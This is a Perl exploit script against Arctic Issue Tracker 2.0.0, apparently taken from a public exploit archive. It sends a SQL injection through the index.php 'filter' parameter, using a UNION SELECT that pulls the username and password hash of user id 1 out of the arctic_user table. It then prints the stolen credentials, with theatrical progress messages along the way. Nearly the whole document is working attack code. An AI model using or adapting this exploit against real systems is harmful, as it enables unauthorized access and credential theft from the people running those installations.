Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

#!/usr/bin/perl

use IO::Socket;

print q{

———————————————–

Arctic Issue Tracker v2.0.0 exploit by ldma

~ SubCode ~

use: arctic.pl [server] [dir]

sample:

$perl arctic.pl localhost /arctic/

———————————————–

};

$webpage = $ARGV[0];

$directory = $ARGV[1];

print " -initiating\\n";

print "|–modules..OK!\\n";

sleep 1;

print "|–premodules..OK!\\n";

sleep 1;

print "|–preprocessors..OK!\\n";

sleep 1;

print " -opening channel.. OK!\\n";

sleep 2;

print "——————————————–\\n";

print "~ configuration complete.. OK!\\n";

print "~ scanning";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!\\n";

if (!$webpage) { die "\\ rtfm geek\\n"; }

$wbb_dir =

"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1–";

print "~ connecting";

$|=1;

foreach (1..1) {

print ".";

sleep 1;

}

print " OK!\\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can\’t connect to Server\\n";

print "~ open exploiting-tree";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!\\n";

print $sock "GET $wbb_dir HTTP/1.1\\n";

print $sock "Accept: */*\\n";

print $sock "User-Agent: Hacker\\n";

print $sock "Host: $webpage\\n";

print $sock "Connection: close\\n\\n";

print "[ ] Target: $webpage\\n";

while ($answer = <$sock>) {

if ($answer =~ /Current Filter: <strong>(.*)<\\/strong>/) {

print "exploiting in progress";

$|=1;

foreach (1..3) {

print "…";

sleep 1;

}

print "OK!\\n[ ] vuln: OK!\\n\\n\\nwell done, ldma!\\n\\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n";

print "[ ] USER-ID: -1\\n";

print "[ ] ID-HASH: $1\\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n";

exit();

}

}

close($sock);

# ldma